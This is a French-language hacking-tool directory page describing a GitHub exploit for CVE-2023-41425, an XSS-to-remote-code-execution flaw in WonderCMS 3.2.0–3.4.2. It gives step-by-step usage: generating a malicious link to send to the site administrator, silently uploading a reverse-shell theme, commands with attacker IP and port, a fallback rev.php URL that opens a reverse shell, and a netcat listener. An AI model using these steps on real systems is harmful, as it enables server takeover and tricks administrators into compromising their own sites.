Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2023-41425-WonderCMS-Authenticated-RCE — Injection XSS, WonderCMS 3.2.0 -3.4.2 | Kitploit
Outils/GitHubGitHub/diegomjx/cve-2023-41425-wondercms-authenticated-rce
Outils de PhishingGénération de PayloadsExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationOutil d'Accès à Distance
GitHubdiegomjx/cve-2023-41425-wondercms-authenticated-rce

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2023-41425-WonderCMS-Authenticated-RCE

Injection XSS, WonderCMS 3.2.0 -3.4.2

Voir le dépôt
13il y a 1 anPas encore vérifié

CVE-2023-41425-WonderCMS-RCE-Authentifié

Description

WonderCMS v3.2.0 - v3.4.2 est vulnérable. Les attaquants distants peuvent prendre le contrôle total du serveur en utilisant une exploitation de Cross-Site Scripting (XSS) (à des fins éducatives uniquement). Voici le plan :

Comment ça fonctionne :

L'exploit abuse du composant installModule de WonderCMS pour injecter un script conçu qui exécute du code arbitraire.

Configuration

  • Outil : exploit.py
  • Ce dont vous avez besoin :
    • URL cible où WonderCMS est installé (aucun mot de passe administrateur requis).
    • L'IP de votre machine d'attaque.
    • Un port pour votre écouteur de reverse shell.

Exécution étape par étape

  1. Le script génère un fichier appelé xss.js. Cette arme JavaScript est conçue pour exploiter une XSS réfléchie.
  2. Il produit un lien malveillant. Vous l'enverrez à l'administrateur.
  3. La magie opère lorsque l'administrateur (un utilisateur connecté) ouvre ou clique sur votre lien :
  • Des requêtes en arrière-plan sont déclenchées sans son consentement.
  • Une charge utile de reverse shell est téléchargée en utilisant la fonctionnalité de téléchargement de thème/plugin.
  1. Une fois téléchargée, la charge utile s'exécute et vous accorde une connexion reverse shell directement sur le serveur cible.
root@kitploit:~
python3 exploit.py <URL> <YOUR_IP> <YOUR_PORT>

Exemple

root@kitploit:~
python3 exploit.py http://sea.htb/loginURL 10.10.14.20 1234

Sécurité de repli :

Si le reverse shell ne se déclenche pas automatiquement, rendez-vous simplement sur :

root@kitploit:~
http://<TARGET_URL>/themes/revshell-main/rev.php?lhost=<YOUR_IP>&lport=<YOUR_PORT>

remarque :

N'oubliez pas de démarrer un écouteur en utilisant la commande suivante :

root@kitploit:~
nc -lvp 4444

Crédits

prodigiousMind pour la découverte et le signalement de la vulnérabilité https://gist.github.com/prodigiousMind/fc69a79629c4ba9ee88a7ad526043413

Télécharger l’outil